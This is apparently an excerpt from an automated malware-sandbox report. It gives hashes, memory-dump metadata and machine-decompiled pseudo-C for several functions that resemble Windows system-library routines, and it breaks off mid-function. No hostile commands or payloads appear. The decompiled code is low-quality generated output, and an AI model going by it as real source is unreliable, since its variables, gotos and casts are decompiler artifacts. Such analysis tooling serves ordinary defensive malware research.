                                                      0x016c7acc
                                                      0x016c7ad0
                                                      0x016c7ad2
                                                      0x00000000
                                                      0x00000000
                                                      0x016c7adb
                                                      0x00000000
                                                      0x016c7adb
                                                      0x016c79d6
                                                      0x016c79d9
                                                      0x016c79dc
                                                      0x016c7a91
                                                      0x016c7a94
                                                      0x00000000
                                                      0x016c7a94
                                                      0x016c79e2
                                                      0x00000000
                                                      0x016c79e2
                                                      0x016c7a74
                                                      0x016c7a7a
                                                      0x00000000
                                                      0x00000000
                                                      0x016c7a8a
                                                      0x016c7a21
                                                      0x016c7a21
                                                      0x00000000
                                                      0x016c7a21
                                                      0x0165c650
                                                      0x0165c651
                                                      0x0165c656
                                                      0x0165c65c
                                                      0x0165c65d
                                                      0x0165c663
                                                      0x0165c664
                                                      0x0165c66a
                                                      0x0165c66e
                                                      0x016c79c5
                                                      0x016c79c7
                                                      0x00000000
                                                      0x016c79c7
                                                      0x0165c67a
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 846d6dc20bd33a960ed02bd99b2835d91184b3b340e89d280b7137d77afe784d
                                                      • Instruction ID: 314ba4f462dae06407214397131be49013ac09324edbe1ee9280d92703fe33dc
                                                      • Opcode Fuzzy Hash: 846d6dc20bd33a960ed02bd99b2835d91184b3b340e89d280b7137d77afe784d
                                                      • Instruction Fuzzy Hash: 468180756042469BDB26CE58CC80A7AB7E9FB84B50F14486EEE469B341D330ED41CFE2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016EB8D0, Relevance: .2, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 39%
                                                      			E016EB8D0(void* __edx, intOrPtr _a4, intOrPtr _a8, signed char _a12, signed int** _a16) {
				char _v8;
				signed int _v12;
				signed int _t80;
				signed int _t83;
				intOrPtr _t89;
				signed int _t92;
				signed char _t106;
				signed int* _t107;
				intOrPtr _t108;
				intOrPtr _t109;
				signed int _t114;
				void* _t115;
				void* _t117;
				void* _t119;
				void* _t122;
				signed int _t123;
				signed int* _t124;

				_t106 = _a12;
				if((_t106 & 0xfffffffc) != 0) {
					return 0xc000000d;
				}
				if((_t106 & 0x00000002) != 0) {
					_t106 = _t106 | 0x00000001;
				}
				_t109 =  *0x1747b9c; // 0x0
				_t124 = L01674620(_t109 + 0x140000,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t109 + 0x140000, 0x424 + (_a8 - 1) * 0xc);
				if(_t124 != 0) {
					 *_t124 =  *_t124 & 0x00000000;
					_t124[1] = _t124[1] & 0x00000000;
					_t124[4] = _t124[4] & 0x00000000;
					if( *((intOrPtr*)( *[fs:0x18] + 0xf9c)) == 0) {
						L13:
						_push(_t124);
						if((_t106 & 0x00000002) != 0) {
							_push(0x200);
							_push(0x28);
							_push(0xffffffff);
							_t122 = E01699800();
							if(_t122 < 0) {
								L33:
								if((_t124[4] & 0x00000001) != 0) {
									_push(4);
									_t64 =  &(_t124[1]); // 0x4
									_t107 = _t64;
									_push(_t107);
									_push(5);
									_push(0xfffffffe);
									E016995B0();
									if( *_t107 != 0) {
										_push( *_t107);
										E016995D0();
									}
								}
								_push(_t124);
								_push(0);
								_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
								L37:
								L016777F0();
								return _t122;
							}
							_t124[4] = _t124[4] | 0x00000002;
							L18:
							_t108 = _a8;
							_t29 =  &(_t124[0x105]); // 0x414
							_t80 = _t29;
							_t30 =  &(_t124[5]); // 0x14
							_t124[3] = _t80;
							_t123 = 0;
							_t124[2] = _t30;
							 *_t80 = _t108;
							if(_t108 == 0) {
								L21:
								_t112 = 0x400;
								_push( &_v8);
								_v8 = 0x400;
								_push(_t124[2]);
								_push(0x400);
								_push(_t124[3]);
								_push(0);
								_push( *_t124);
								_t122 = E01699910();
								if(_t122 != 0xc0000023) {
									L26:
									if(_t122 != 0x106) {
										L40:
										if(_t122 < 0) {
											L29:
											_t83 = _t124[2];
											if(_t83 != 0) {
												_t59 =  &(_t124[5]); // 0x14
												if(_t83 != _t59) {
													L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t83);
												}
											}
											_push( *_t124);
											E016995D0();
											goto L33;
										}
										 *_a16 = _t124;
										return 0;
									}
									if(_t108 != 1) {
										_t122 = 0;
										goto L40;
									}
									_t122 = 0xc0000061;
									goto L29;
								} else {
									goto L22;
								}
								while(1) {
									L22:
									_t89 =  *0x1747b9c; // 0x0
									_t92 = L01674620(_t112,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t89 + 0x140000, _v8);
									_t124[2] = _t92;
									if(_t92 == 0) {
										break;
									}
									_t112 =  &_v8;
									_push( &_v8);
									_push(_t92);
									_push(_v8);
									_push(_t124[3]);
									_push(0);
									_push( *_t124);
									_t122 = E01699910();
									if(_t122 != 0xc0000023) {
										goto L26;
									}
									L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t124[2]);
								}
								_t122 = 0xc0000017;
								goto L26;
							}
							_t119 = 0;
							do {
								_t114 = _t124[3];
								_t119 = _t119 + 0xc;
								 *((intOrPtr*)(_t114 + _t119 - 8)) =  *((intOrPtr*)(_a4 + _t123 * 4));
								 *(_t114 + _t119 - 4) =  *(_t114 + _t119 - 4) & 0x00000000;
								_t123 = _t123 + 1;
								 *((intOrPtr*)(_t124[3] + _t119)) = 2;
							} while (_t123 < _t108);
							goto L21;
						}
						_push(0x28);
						_push(3);
						_t122 = E0165A7B0();
						if(_t122 < 0) {
							goto L33;
						}
						_t124[4] = _t124[4] | 0x00000001;
						goto L18;
					}
					if((_t106 & 0x00000001) == 0) {
						_t115 = 0x28;
						_t122 = E016EE7D3(_t115, _t124);
						if(_t122 < 0) {
							L9:
							_push(_t124);
							_push(0);
							_push( *((intOrPtr*)( *[fs:0x30] + 0x18)));
							goto L37;
						}
						L12:
						if( *_t124 != 0) {
							goto L18;
						}
						goto L13;
					}
					_t15 =  &(_t124[1]); // 0x4
					_t117 = 4;
					_t122 = E016EE7D3(_t117, _t15);
					if(_t122 >= 0) {
						_t124[4] = _t124[4] | 0x00000001;
						_v12 = _v12 & 0x00000000;
						_push(4);
						_push( &_v12);
						_push(5);
						_push(0xfffffffe);
						E016995B0();
						goto L12;
					}
					goto L9;
				} else {
					return 0xc0000017;
				}
			}




















                                                      0x016eb8d9
                                                      0x016eb8e4
                                                      0x00000000
                                                      0x016eb8e6
                                                      0x016eb8f3
                                                      0x016eb8f5
                                                      0x016eb8f5
                                                      0x016eb8f8
                                                      0x016eb920
                                                      0x016eb924
                                                      0x016eb936
                                                      0x016eb939
                                                      0x016eb93d
                                                      0x016eb948
                                                      0x016eb9a0
                                                      0x016eb9a0
                                                      0x016eb9a4
                                                      0x016eb9bf
                                                      0x016eb9c4
                                                      0x016eb9c6
                                                      0x016eb9cd
                                                      0x016eb9d1
                                                      0x016ebad4
                                                      0x016ebad8
                                                      0x016ebada
                                                      0x016ebadc
                                                      0x016ebadc
                                                      0x016ebadf
                                                      0x016ebae0
                                                      0x016ebae2
                                                      0x016ebae4
                                                      0x016ebaec
                                                      0x016ebaee
                                                      0x016ebaf0
                                                      0x016ebaf0
                                                      0x016ebaec
                                                      0x016ebafb
                                                      0x016ebafc
                                                      0x016ebafe
                                                      0x016ebb01
                                                      0x016ebb01
                                                      0x00000000
                                                      0x016ebb06
                                                      0x016eb9d7
                                                      0x016eb9db
                                                      0x016eb9db
                                                      0x016eb9de
                                                      0x016eb9de
                                                      0x016eb9e4
                                                      0x016eb9e7
                                                      0x016eb9ea
                                                      0x016eb9ec
                                                      0x016eb9ef
                                                      0x016eb9f3
                                                      0x016eba1b
                                                      0x016eba1b
                                                      0x016eba23
                                                      0x016eba24
                                                      0x016eba27
                                                      0x016eba2a
                                                      0x016eba2b
                                                      0x016eba2e
                                                      0x016eba30
                                                      0x016eba37
                                                      0x016eba3f
                                                      0x016eba9c
                                                      0x016ebaa2
                                                      0x016ebb13
                                                      0x016ebb15
                                                      0x016ebaae
                                                      0x016ebaae
                                                      0x016ebab3
                                                      0x016ebab5
                                                      0x016ebaba
                                                      0x016ebac8
                                                      0x016ebac8
                                                      0x016ebaba
                                                      0x016ebacd
                                                      0x016ebacf
                                                      0x00000000
                                                      0x016ebacf
                                                      0x016ebb1a
                                                      0x00000000
                                                      0x016ebb1c
                                                      0x016ebaa7
                                                      0x016ebb11
                                                      0x00000000
                                                      0x016ebb11
                                                      0x016ebaa9
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x016eba41
                                                      0x016eba41
                                                      0x016eba41
                                                      0x016eba58
                                                      0x016eba5d
                                                      0x016eba62
                                                      0x00000000
                                                      0x00000000
                                                      0x016eba64
                                                      0x016eba67
                                                      0x016eba68
                                                      0x016eba69
                                                      0x016eba6c
                                                      0x016eba6f
                                                      0x016eba71
                                                      0x016eba78
                                                      0x016eba80
                                                      0x00000000
                                                      0x00000000
                                                      0x016eba90
                                                      0x016eba90
                                                      0x016eba97
                                                      0x00000000
                                                      0x016eba97
                                                      0x016eb9f5
                                                      0x016eb9f7
                                                      0x016eb9f7
                                                      0x016eb9fa
                                                      0x016eba03
                                                      0x016eba07
                                                      0x016eba0c
                                                      0x016eba10
                                                      0x016eba17
                                                      0x00000000
                                                      0x016eb9f7
                                                      0x016eb9a6
                                                      0x016eb9a8
                                                      0x016eb9af
                                                      0x016eb9b3
                                                      0x00000000
                                                      0x00000000
                                                      0x016eb9b9
                                                      0x00000000
                                                      0x016eb9b9
                                                      0x016eb94d
                                                      0x016eb98f
                                                      0x016eb995
                                                      0x016eb999
                                                      0x016eb960
                                                      0x016eb967
                                                      0x016eb968
                                                      0x016eb96a
                                                      0x00000000
                                                      0x016eb96a
                                                      0x016eb99b
                                                      0x016eb99e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x016eb99e
                                                      0x016eb951
                                                      0x016eb954
                                                      0x016eb95a
                                                      0x016eb95e
                                                      0x016eb972
                                                      0x016eb979
                                                      0x016eb97d
                                                      0x016eb97f
                                                      0x016eb980
                                                      0x016eb982
                                                      0x016eb984
                                                      0x00000000
                                                      0x016eb984
                                                      0x00000000
                                                      0x016eb926
                                                      0x00000000
                                                      0x016eb926

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 09f1ee1affd5008ba23acd8f000933ecb25852d20b951d2229ee38c37ec52a11
                                                      • Instruction ID: 8bcdb19862458e7bacdbf82d5da4682318a0d7684eeb6161a9afe83bbb11dbe0
                                                      • Opcode Fuzzy Hash: 09f1ee1affd5008ba23acd8f000933ecb25852d20b951d2229ee38c37ec52a11
                                                      • Instruction Fuzzy Hash: 3071F132201702EFEB32DF18CC48F66BBE6EB40720F15462CEA559B2A0DB71E945CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016D6DC9, Relevance: .2, Instructions: 199COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 79%
                                                      			E016D6DC9(signed int __ecx, void* __edx) {
				unsigned int _v8;
				intOrPtr _v12;
				signed int _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				char _v60;
				void* _t87;
				void* _t95;
				signed char* _t96;
				signed int _t107;
				signed int _t136;
				signed char* _t137;
				void* _t157;
				void* _t161;
				void* _t167;
				intOrPtr _t168;
				void* _t174;
				void* _t175;
				signed int _t176;
				void* _t177;

				_t136 = __ecx;
				_v44 = 0;
				_t167 = __edx;
				_v40 = 0;
				_v36 = 0;
				_v32 = 0;
				_v60 = 0;
				_v56 = 0;
				_v52 = 0;
				_v48 = 0;
				_v16 = __ecx;
				_t87 = L01674620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0x248);
				_t175 = _t87;
				if(_t175 != 0) {
					_t11 = _t175 + 0x30; // 0x30
					 *((short*)(_t175 + 6)) = 0x14d4;
					 *((intOrPtr*)(_t175 + 0x20)) =  *((intOrPtr*)(_t167 + 0x10));
					 *((intOrPtr*)(_t175 + 0x24)) =  *((intOrPtr*)( *((intOrPtr*)(_t167 + 8)) + 0xc));
					 *((intOrPtr*)(_t175 + 0x28)) = _t136;
					 *((intOrPtr*)(_t175 + 0x2c)) =  *((intOrPtr*)(_t167 + 0x14));
					E016D6B4C(_t167, _t11, 0x214,  &_v8);
					_v12 = _v8 + 0x10;
					_t95 = E01677D50();
					_t137 = 0x7ffe0384;
					if(_t95 == 0) {
						_t96 = 0x7ffe0384;
					} else {
						_t96 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t175);
					_push(_v12);
					_push(0x402);
					_push( *_t96 & 0x000000ff);
					E01699AE0();
					_t87 = L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t175);
					_t176 = _v16;
					if((_t176 & 0x00000100) != 0) {
						_push( &_v36);
						_t157 = 4;
						_t87 = E016D795D( *((intOrPtr*)(_t167 + 8)), _t157);
						if(_t87 >= 0) {
							_v24 = E016D795D( *((intOrPtr*)(_t167 + 8)), 1,  &_v44);
							_v28 = E016D795D( *((intOrPtr*)(_t167 + 8)), 0,  &_v60);
							_push( &_v52);
							_t161 = 5;
							_t168 = E016D795D( *((intOrPtr*)(_t167 + 8)), _t161);
							_v20 = _t168;
							_t107 = L01674620( *[fs:0x30],  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, 0xca0);
							_v16 = _t107;
							if(_t107 != 0) {
								_v8 = _v8 & 0x00000000;
								 *(_t107 + 0x20) = _t176;
								 *((short*)(_t107 + 6)) = 0x14d5;
								_t47 = _t107 + 0x24; // 0x24
								_t177 = _t47;
								E016D6B4C( &_v36, _t177, 0xc78,  &_v8);
								_t51 = _v8 + 4; // 0x4
								_t178 = _t177 + (_v8 >> 1) * 2;
								_v12 = _t51;
								E016D6B4C( &_v44, _t177 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_v12 = _v12 + _v8;
								E016D6B4C( &_v60, _t178 + (_v8 >> 1) * 2, 0xc78,  &_v8);
								_t125 = _v8;
								_v12 = _v12 + _v8;
								E016D6B4C( &_v52, _t178 + (_v8 >> 1) * 2 + (_v8 >> 1) * 2, 0xc78 - _v8 - _v8 - _t125,  &_v8);
								_t174 = _v12 + _v8;
								if(E01677D50() != 0) {
									_t137 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
								}
								_push(_v16);
								_push(_t174);
								_push(0x402);
								_push( *_t137 & 0x000000ff);
								E01699AE0();
								L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v16);
								_t168 = _v20;
							}
							_t87 = L01672400( &_v36);
							if(_v24 >= 0) {
								_t87 = L01672400( &_v44);
							}
							if(_t168 >= 0) {
								_t87 = L01672400( &_v52);
							}
							if(_v28 >= 0) {
								return L01672400( &_v60);
							}
						}
					}
				}
				return _t87;
			}































                                                      0x016d6dd4
                                                      0x016d6dde
                                                      0x016d6de1
                                                      0x016d6de3
                                                      0x016d6de6
                                                      0x016d6de9
                                                      0x016d6dec
                                                      0x016d6def
                                                      0x016d6df2
                                                      0x016d6df5
                                                      0x016d6dfe
                                                      0x016d6e04
                                                      0x016d6e09
                                                      0x016d6e0d
                                                      0x016d6e18
                                                      0x016d6e1b
                                                      0x016d6e22
                                                      0x016d6e2d
                                                      0x016d6e30
                                                      0x016d6e36
                                                      0x016d6e42
                                                      0x016d6e4d
                                                      0x016d6e50
                                                      0x016d6e55
                                                      0x016d6e5c
                                                      0x016d6e6e
                                                      0x016d6e5e
                                                      0x016d6e67
                                                      0x016d6e67
                                                      0x016d6e73
                                                      0x016d6e74
                                                      0x016d6e77
                                                      0x016d6e7c
                                                      0x016d6e7d
                                                      0x016d6e8e
                                                      0x016d6e93
                                                      0x016d6e9c
                                                      0x016d6ea8
                                                      0x016d6eab
                                                      0x016d6eac
                                                      0x016d6eb3
                                                      0x016d6ecd
                                                      0x016d6edc
                                                      0x016d6ee2
                                                      0x016d6ee5
                                                      0x016d6ef2
                                                      0x016d6efb
                                                      0x016d6f01
                                                      0x016d6f06
                                                      0x016d6f0b
                                                      0x016d6f11
                                                      0x016d6f1a
                                                      0x016d6f22
                                                      0x016d6f26
                                                      0x016d6f26
                                                      0x016d6f33
                                                      0x016d6f41
                                                      0x016d6f44
                                                      0x016d6f47
                                                      0x016d6f54
                                                      0x016d6f65
                                                      0x016d6f77
                                                      0x016d6f7c
                                                      0x016d6f82
                                                      0x016d6f91
                                                      0x016d6f99
                                                      0x016d6fa3
                                                      0x016d6fae
                                                      0x016d6fae
                                                      0x016d6fba
                                                      0x016d6fbb
                                                      0x016d6fbc
                                                      0x016d6fc1
                                                      0x016d6fc2
                                                      0x016d6fd3
                                                      0x016d6fd8
                                                      0x016d6fd8
                                                      0x016d6fdf
                                                      0x016d6fe8
                                                      0x016d6fee
                                                      0x016d6fee
                                                      0x016d6ff5
                                                      0x016d6ffb
                                                      0x016d6ffb
                                                      0x016d7004
                                                      0x00000000
                                                      0x016d700a
                                                      0x016d7004
                                                      0x016d6eb3
                                                      0x016d6e9c
                                                      0x016d7015

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                      • Instruction ID: 06c110a496b3201ba53c58a2e761d6fff60f08591a17e353f8556a0ac78d5c93
                                                      • Opcode Fuzzy Hash: 14c8b9f4068581bf64678a8c47a68024946722c1230469e973f7e326b4b11c8c
                                                      • Instruction Fuzzy Hash: 09716E71E0061AEFDB10DFA9CD84AEEBBBAFF48714F104469E505E7250DB34AA41CB94
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 016552A5, Relevance: .2, Instructions: 161COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E016552A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					E0166EEF0(0x17479a0);
					_t104 =  *0x1748210; // 0x1202c80
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0166EB70(_t93, 0x17479a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E01699890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									E0166EEF0(0x17479a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0166EB70(0, 0x17479a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x1202c8d
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0168F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									E0166EEF0(0x17479a0);
									__eflags =  *0x1748210 - _t104; // 0x1202c80
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1748210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E016D4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0166EB70(_t95, 0x17479a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E016995D0();
											L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E016995D0();
											L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0166EB70(_t93, 0x17479a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E016995D0();
										L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E016995D0();
										L016777F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0168F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                      0x016552a5
                                                      0x016552ad
                                                      0x016552b0
                                                      0x016552b3
                                                      0x016552b7
                                                      0x016552ba
                                                      0x016552bf
                                                      0x016552c4
                                                      0x016552cc
                                                      0x00000000
                                                      0x00000000
                                                      0x016552ce
                                                      0x016552d9
                                                      0x016552dd
                                                      0x016552e7
                                                      0x016552f7
                                                      0x016552f9
                                                      0x016552fd
                                                      0x016b0dcf
                                                      0x016b0dd5
                                                      0x016b0dd6
                                                      0x016b0dd7
                                                      0x016b0dd8
                                                      0x016b0dd9
                                                      0x016b0dde
                                                      0x016b0ddf
                                                      0x016b0de0
                                                      0x016b0de1
                                                      0x016b0de2
                                                      0x016b0de5
                                                      0x016b0dea
                                                      0x016b0dec
                                                      0x016b0f60
                                                      0x016b0f64
                                                      0x016b0f70
                                                      0x016b0f76
                                                      0x016b0f79
                                                      0x016b0f79
                                                      0x00000000
                                                      0x016b0f64
                                                      0x016b0df2
                                                      0x016b0df7
                                                      0x016b0e04
                                                      0x016b0e0d
                                                      0x016b0e0d
                                                      0x016b0e10
                                                      0x016b0e1a
                                                      0x016b0e1c
                                                      0x016b0e4c
                                                      0x016b0e52
                                                      0x016b0e61
                                                      0x016b0e67
                                                      0x016b0e6b
                                                      0x016b0e70
                                                      0x016b0e76
                                                      0x016b0ed7
                                                      0x016b0edc
                                                      0x016b0ee0
                                                      0x016b0ee6
                                                      0x016b0eea
                                                      0x016b0eed
                                                      0x016b0ef0
                                                      0x016b0ef3
                                                      0x016b0ef6
                                                      0x016b0ef9
                                                      0x016b0efe
                                                      0x016b0f01
                                                      0x016b0f01
                                                      0x016b0f0b
                                                      0x016b0f12
                                                      0x016b0f16
                                                      0x016b0f18
                                                      0x016b0f1b
                                                      0x016b0f2c
                                                      0x016b0f31
                                                      0x016b0f31
                                                      0x016b0f35
                                                      0x016b0f39
                                                      0x016b0f3a
                                                      0x016b0f3c
                                                      0x016b0f3f
                                                      0x016b0f50
                                                      0x016b0f55
                                                      0x016b0f55
                                                      0x016b0f59
                                                      0x016552eb
                                                      0x016552f1
                                                      0x016552f1
                                                      0x016b0e7d
                                                      0x016b0e84
                                                      0x016b0e88
                                                      0x016b0e8a
                                                      0x016b0e8d
                                                      0x016b0e9e
                                                      0x016b0ea3
                                                      0x016b0ea3
                                                      0x016b0ea7
                                                      0x016b0eaf
                                                      0x016b0eb3
                                                      0x016b0eb9
                                                      0x016b0eb9
                                                      0x016b0ebc
                                                      0x016b0ecd
                                                      0x016b0ecd
                                                      0x00000000
                                                      0x016b0eb3
                                                      0x016b0e21
                                                      0x016b0e2b
                                                      0x016b0e2f
                                                      0x016b0e30
                                                      0x016b0e3a
                                                      0x016b0e3f
                                                      0x016b0e41
                                                      0x00000000
                                                      0x00000000
                                                      0x016b0e47
                                                      0x00000000
                                                      0x016b0e47
                                                      0x016b0df9
                                                      0x016b0dfe
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x016b0dfe
                                                      0x01655303
                                                      0x01655307
                                                      0x00000000
                                                      0x01655309
                                                      0x00000000
                                                      0x01655309
                                                      0x01655307
                                                      0x016552e9
                                                      0x016552e9
                                                      0x00000000
                                                      0x016552e9
                                                      0x0165530e
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.272089721.0000000001630000.00000040.00000001.sdmp, Offset: 01630000, based on PE: true
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 8f2d785d7fe4c7f8960a440ee957b217c1f0b58a0a6d92435cc63ca4cf4a5fa9
                                                      • Instruction ID: f73f6e7ae2ab52a682f9bdd2d79a9c74193f70b86ccb3181c89e47ad15baf1ee
                                                      • Opcode Fuzzy Hash: 8f2d785d7fe4c7f8960a440ee957b217c1f0b58a0a6d92435cc63ca4cf4a5fa9
                                                      • Instruction Fuzzy Hash: 2751DB71205342ABD721EF68CC84B2BBBE9FF90710F10491EF89687651E770E845CB96
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01682AE4, Relevance: .2, Instructions: 159COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E01682AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x1748204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x1748208; // 0x1748207
				_t8 = _t57 + 0x1748208; // 0x1748207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x1748450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x174821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x1746d5c; // 0x7fbc0654
							_t72 =  *0x1746d5c; // 0x7fbc0654
